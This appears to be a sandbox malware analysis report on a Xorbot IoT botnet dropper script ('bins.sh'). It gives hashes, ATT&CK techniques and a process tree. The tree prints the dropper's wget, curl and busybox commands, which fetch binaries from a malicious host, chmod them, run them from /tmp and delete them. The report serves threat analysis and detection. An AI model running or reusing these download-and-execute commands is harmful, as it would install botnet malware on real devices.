xorbot | 9faabe01ff89b4a68e68ac5fded815e7a1574057482f7ed301b94feb9cbb1e52

Analysis

max time kernel
150s
max time network
73s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11/12/2024, 02:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

c3f019a7352fe8f83f6e1dc7cfe4cc11
SHA1

46878d89421696772fb817f1ab2c3da137b30002
SHA256

9faabe01ff89b4a68e68ac5fded815e7a1574057482f7ed301b94feb9cbb1e52
SHA512

f1ba2cce684b38f648a4ef5e5a92ab414b7d8687d4da0be9dd658cef9527fb8516db95955aa56c9e138a274d00362250a387d85fbe4576713debc0c6cbecf58e
SSDEEP

96:YlFpLokYL6yQMrMHMJ9GWeDEDIDD+WBLvDHNNNNNuF5jL990LDfBVrVHVGXHlUjg:p4y8HJ1GXHlTwg01o0J1GXHDwgs1E

Score

10^/10

xorbot antivm botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
769	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL	770	KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
660	wget
665	curl
768	busybox
773	wget
776	curl

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:652
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:655
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - System Network Configuration Discovery
  PID:660
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:665
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - System Network Configuration Discovery
  PID:768
- /bin/chmod
  chmod 777 KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  ./KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  - Executes dropped EXE
  PID:770
- /bin/rm
  rm KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL
  2⤵
  PID:772
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  - System Network Configuration Discovery
  PID:773
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/5YLNvCLIx3rjUO1nLrd4RLbDA1Pltj1A4E
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/KGtLzINmZY4aCKpq1VnoAaFNo3EDcw4DBL

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads